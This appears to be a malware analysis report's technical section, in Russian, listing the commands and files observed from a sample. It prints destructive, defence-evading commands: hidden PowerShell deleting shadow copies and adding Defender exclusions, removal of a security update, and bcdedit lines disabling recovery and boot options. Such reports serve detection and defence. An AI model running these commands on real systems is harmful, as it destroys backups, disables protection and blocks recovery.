Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "vssadmin.exe delete shadows /all /quiet; Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -...
- %HOMEPATH%\desktop\000814251_video_01.avi
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\archer.avi
- %HOMEPATH%\desktop\contosoroot.cer
- %HOMEPATH%\desktop\contoso_1.cer
- %HOMEPATH%\desktop\google chrome.lnk
- %HOMEPATH%\desktop\telegram.lnk
- '<SYSTEM32>\cmd.exe' /c "wusa /uninstall /kb:890830 /quiet /norestart & bcdedit /set {current} bootems off & bcdedit /set {current} advancedoptions off & bcdedit /set {current} optionsedit off & bcdedit /set {curre...
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\bcdedit.exe' /set {current} bootems off
- '<SYSTEM32>\bcdedit.exe' /set {current} advancedoptions off
- '<SYSTEM32>\bcdedit.exe' /set {current} optionsedit off
- '<SYSTEM32>\bcdedit.exe' /set {current} bootstatuspolicy IgnoreAllFailures
- '<SYSTEM32>\bcdedit.exe' /set {current} recoveryenabled off